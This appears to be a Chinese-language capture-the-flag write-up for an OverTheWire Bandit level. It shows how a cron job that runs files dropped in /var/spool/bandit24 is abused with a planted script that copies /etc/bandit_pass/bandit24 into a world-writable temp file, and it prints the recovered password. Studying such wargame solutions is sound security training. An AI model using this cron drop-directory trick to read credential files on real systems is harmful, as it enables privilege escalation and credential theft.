A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
解密
bandit23@bandit:~$ ls -l /etc/cron.d/
total 12
-rw-r--r-- 1 root root 120 Oct 16 2018 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct 16 2018 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct 16 2018 cronjob_bandit24
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
阅读shell,可以看出,bandit24会去执行/var/spool/bandit24下所有文件,所以我们要做一个bandit24可执行文件,把bandit24密码写入/tmp/下的一个都可读文件。
bandit23@bandit:~$ clear
bandit23@bandit:~$ mktemp
/tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ mktemp
/tmp/tmp.HsO4hET86S
bandit23@bandit:~$ vim /tmp/tmp.HsO4hET86S
...
bandit23@bandit:~$ cat /tmp/tmp.HsO4hET86S
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ chmod +rx /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ ls -l /tmp/tmp.HsO4hET86S
-rwxr-xr-x 1 bandit23 root 65 Sep 10 16:43 /tmp/tmp.HsO4hET86S
bandit23@bandit:~$ chmod 666 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ ls -l /tmp/tmp.Mcx9oNLd3Q
-rw-rw-rw- 1 bandit23 root 0 Sep 10 16:42 /tmp/tmp.Mcx9oNLd3Q
bandit23@bandit:~$ cp /tmp/tmp.HsO4hET86S /var/spool/bandit24/
... wait
bandit23@bandit:~$ cat /tmp/tmp.Mcx9oNLd3Q
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
知识点
- 阅读bandit24的脚本,理解在做什么事情;
- 注意权限的控制,让我们写的脚本文件可以允许第三方执行:rx,让目标文件可以被第三方写入:rw;